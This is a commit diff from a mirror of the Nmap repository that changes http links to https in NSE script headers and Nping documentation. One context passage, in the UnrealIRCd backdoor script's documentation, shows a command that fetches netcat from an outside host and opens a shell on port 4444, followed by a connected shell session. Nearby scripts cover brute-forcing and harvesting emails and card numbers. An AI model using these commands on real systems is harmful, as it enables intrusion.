1
0
mirror of https://github.com/nmap/nmap.git synced 2025-12-07 13:11:28 +00:00

Fix some http->https urls

This commit is contained in:
dmiller
2018-10-09 17:06:03 +00:00
parent 009957693d
commit bd67aa3672
8 changed files with 17 additions and 19 deletions

View File

@@ -48,7 +48,7 @@ the script will fail unless a single interface is present on the system.
-- --
author = "Emiliano Ticci" author = "Emiliano Ticci"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html" license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"broadcast", "discovery", "safe"} categories = {"broadcast", "discovery", "safe"}
prerule = function() prerule = function()

View File

@@ -35,7 +35,7 @@ CICS User ID brute forcing script for the CESL login screen.
-- 2017-01-23 - v0.3 - Rewrote script to use fields and skip enumeration to speed up testing -- 2017-01-23 - v0.3 - Rewrote script to use fields and skip enumeration to speed up testing
author = "Philip Young aka Soldier of Fortran" author = "Philip Young aka Soldier of Fortran"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html" license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive", "brute"} categories = {"intrusive", "brute"}
portrule = shortport.port_or_service({23,992}, "tn3270") portrule = shortport.port_or_service({23,992}, "tn3270")

View File

@@ -24,7 +24,7 @@ Performs brute force password auditing against the DelugeRPC daemon.
-- |_ Performed 8 guesses in 1 seconds, average tps: 8 -- |_ Performed 8 guesses in 1 seconds, average tps: 8
author = "Claudiu Perta <claudiu.perta@gmail.com>" author = "Claudiu Perta <claudiu.perta@gmail.com>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html" license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive", "brute"} categories = {"intrusive", "brute"}
portrule = shortport.port_or_service(58846, "deluge-rpc") portrule = shortport.port_or_service(58846, "deluge-rpc")

View File

@@ -20,16 +20,14 @@ The script searches for email and ip by default.
-- nmap -p 80 www.example.com --script http-grep --script-args='match="[A-Za-z0-9%.%%%+%-]+@[A-Za-z0-9%.%%%+%-]+%.%w%w%w?%w?",breakonmatch' -- nmap -p 80 www.example.com --script http-grep --script-args='match="[A-Za-z0-9%.%%%+%-]+@[A-Za-z0-9%.%%%+%-]+%.%w%w%w?%w?",breakonmatch'
-- nmap -p 80 www.example.com --script http-grep --script-args 'http-grep.builtins ={"mastercard", "discover"}, http-grep.url="example.html"' -- nmap -p 80 www.example.com --script http-grep --script-args 'http-grep.builtins ={"mastercard", "discover"}, http-grep.url="example.html"'
-- @output -- @output
-- PORT STATE SERVICE REASON
-- 80/tcp open http syn-ack
-- | http-grep: -- | http-grep:
-- | (1) http://nmap.org/book/man-bugs.html: -- | (1) https://nmap.org/book/man-bugs.html:
-- | (1) email: -- | (1) email:
-- | + dev@nmap.org -- | + dev@nmap.org
-- | (1) http://nmap.org/book/install.html: -- | (1) https://nmap.org/book/install.html:
-- | (1) email: -- | (1) email:
-- | + fyodor@nmap.org -- | + fyodor@nmap.org
-- | (16) http://nmap.org/changelog.html: -- | (16) https://nmap.org/changelog.html:
-- | (7) ip: -- | (7) ip:
-- | + 255.255.255.255 -- | + 255.255.255.255
-- | + 10.99.24.140 -- | + 10.99.24.140
@@ -48,7 +46,7 @@ The script searches for email and ip by default.
-- | + president@whitehouse.gov -- | + president@whitehouse.gov
-- | + haesslich@loyalty.org -- | + haesslich@loyalty.org
-- | + rchong@fcc.gov -- | + rchong@fcc.gov
-- | (6) http://nmap.org/5/#5changes: -- | (6) https://nmap.org/5/#5changes:
-- | (6) ip: -- | (6) ip:
-- | + 207.68.200.30 -- | + 207.68.200.30
-- | + 64.13.134.52 -- | + 64.13.134.52
@@ -76,17 +74,17 @@ The script searches for email and ip by default.
-- visa, amex, ssn and ip addresses. If you just put in script-args http-grep.builtins then all will be enabled. -- visa, amex, ssn and ip addresses. If you just put in script-args http-grep.builtins then all will be enabled.
-- --
-- @xmloutput -- @xmloutput
-- <table key="(1) http://nmap.org/book/man-bugs.html"> -- <table key="(1) https://nmap.org/book/man-bugs.html">
-- <table key="(1) email"> -- <table key="(1) email">
-- <elem>+ dev@nmap.org</elem> -- <elem>+ dev@nmap.org</elem>
-- </table> -- </table>
-- </table> -- </table>
-- <table key="(1) http://nmap.org/book/install.html"> -- <table key="(1) https://nmap.org/book/install.html">
-- <table key="(1) email"> -- <table key="(1) email">
-- <elem>+ fyodor@nmap.org</elem> -- <elem>+ fyodor@nmap.org</elem>
-- </table> -- </table>
-- </table> -- </table>
-- <table key="(16) http://nmap.org/changelog.html"> -- <table key="(16) https://nmap.org/changelog.html">
-- <table key="(7) ip"> -- <table key="(7) ip">
-- <elem>+ 255.255.255.255</elem> -- <elem>+ 255.255.255.255</elem>
-- <elem>+ 10.99.24.140</elem> -- <elem>+ 10.99.24.140</elem>
@@ -108,7 +106,7 @@ The script searches for email and ip by default.
-- <elem>+ rchong@fcc.gov</elem> -- <elem>+ rchong@fcc.gov</elem>
-- </table> -- </table>
-- </table> -- </table>
-- <table key="(6) http://nmap.org/5/#5changes"> -- <table key="(6) https://nmap.org/5/#5changes">
-- <table key="(6) ip"> -- <table key="(6) ip">
-- <elem>+ 207.68.200.30</elem> -- <elem>+ 207.68.200.30</elem>
-- <elem>+ 64.13.134.52</elem> -- <elem>+ 64.13.134.52</elem>

View File

@@ -17,7 +17,7 @@ netcat listener as demonstrated here:
<code> <code>
$ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' <target> $ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' <target>
$ ncat -vv localhost 4444 $ ncat -vv localhost 4444
Ncat: Version 5.30BETA1 ( http://nmap.org/ncat ) Ncat: Version 5.30BETA1 ( https://nmap.org/ncat )
Ncat: Connected to 127.0.0.1:4444. Ncat: Connected to 127.0.0.1:4444.
pwd pwd
/home/ron/downloads/Unreal3.2-bad /home/ron/downloads/Unreal3.2-bad

View File

@@ -37,7 +37,7 @@ authentication.
-- @args publickeydb Specifies alternative publickeydb -- @args publickeydb Specifies alternative publickeydb
author = "Devin Bjelland" author = "Devin Bjelland"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html" license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"auth", "intrusive"} categories = {"auth", "intrusive"}
local privatekeys = stdnse.get_script_args "ssh.privatekeys" local privatekeys = stdnse.get_script_args "ssh.privatekeys"

View File

@@ -33,7 +33,7 @@ Runs remote command on ssh server and returns command output.
author = "Devin Bjelland" author = "Devin Bjelland"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html" license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { categories = {
'intrusive', 'intrusive',

View File

@@ -136,7 +136,7 @@
luis@Aberdeen:~$ sudo nping --ec public echo.nmap.org -p90-92 --tcp --count 1 --no-capture luis@Aberdeen:~$ sudo nping --ec public echo.nmap.org -p90-92 --tcp --count 1 --no-capture
Starting Nping 0.5.52.IPv6.Beta2 ( http://nmap.org/nping ) at 2011-07-05 12:53 CEST Starting Nping 0.5.52.IPv6.Beta2 ( https://nmap.org/nping ) at 2011-07-05 12:53 CEST
SENT (7.3302s) TCP 163.117.203.253:18554 > 74.207.244.221:90 S ttl=64 SENT (7.3302s) TCP 163.117.203.253:18554 > 74.207.244.221:90 S ttl=64
CAPT (7.4625s) TCP 163.117.203.253:18554 > 74.207.244.221:90 S ttl=54 CAPT (7.4625s) TCP 163.117.203.253:18554 > 74.207.244.221:90 S ttl=54
SENT (8.3309s) TCP 163.117.203.253:18554 > 74.207.244.221:91 S ttl=64 SENT (8.3309s) TCP 163.117.203.253:18554 > 74.207.244.221:91 S ttl=64
@@ -154,7 +154,7 @@
luis@Aberdeen:~$ sudo nping --ec public echo.nmap.org -p90 --tcp --count 1 luis@Aberdeen:~$ sudo nping --ec public echo.nmap.org -p90 --tcp --count 1
Starting Nping 0.5.52.IPv6.Beta2 ( http://nmap.org/nping ) at 2011-07-05 12:51 CEST Starting Nping 0.5.52.IPv6.Beta2 ( https://nmap.org/nping ) at 2011-07-05 12:51 CEST
SENT (1.8965s) TCP 163.117.203.253:64288 > 74.207.244.221:90 S ttl=64 SENT (1.8965s) TCP 163.117.203.253:64288 > 74.207.244.221:90 S ttl=64
CAPT (2.0293s) TCP 163.117.203.253:64288 > 74.207.244.221:90 S ttl=54 CAPT (2.0293s) TCP 163.117.203.253:64288 > 74.207.244.221:90 S ttl=54
RCVD (2.1233s) TCP 74.207.244.221:90 > 163.117.203.253:64288 RA ttl=51 RCVD (2.1233s) TCP 74.207.244.221:90 > 163.117.203.253:64288 RA ttl=51
@@ -784,7 +784,7 @@
sudo nping --arp 192.168.240.139 -vvv -d1 sudo nping --arp 192.168.240.139 -vvv -d1
Starting Nping 0.5.59BETA1 ( http://nmap.org/nping ) at 2011-07-11 12:32 CEST Starting Nping 0.5.59BETA1 ( https://nmap.org/nping ) at 2011-07-11 12:32 CEST
BPF-filter: arp and arp[6]==0x00 and arp[7]==0x02 BPF-filter: arp and arp[6]==0x00 and arp[7]==0x02
SENT (0.0562s) ARP who has 192.168.240.139? Tell 192.168.240.1 SENT (0.0562s) ARP who has 192.168.240.139? Tell 192.168.240.1
0000 ff ff ff ff ff ff 00 50 56 c0 00 01 08 06 00 01 .......PV....... 0000 ff ff ff ff ff ff 00 50 56 c0 00 01 08 06 00 01 .......PV.......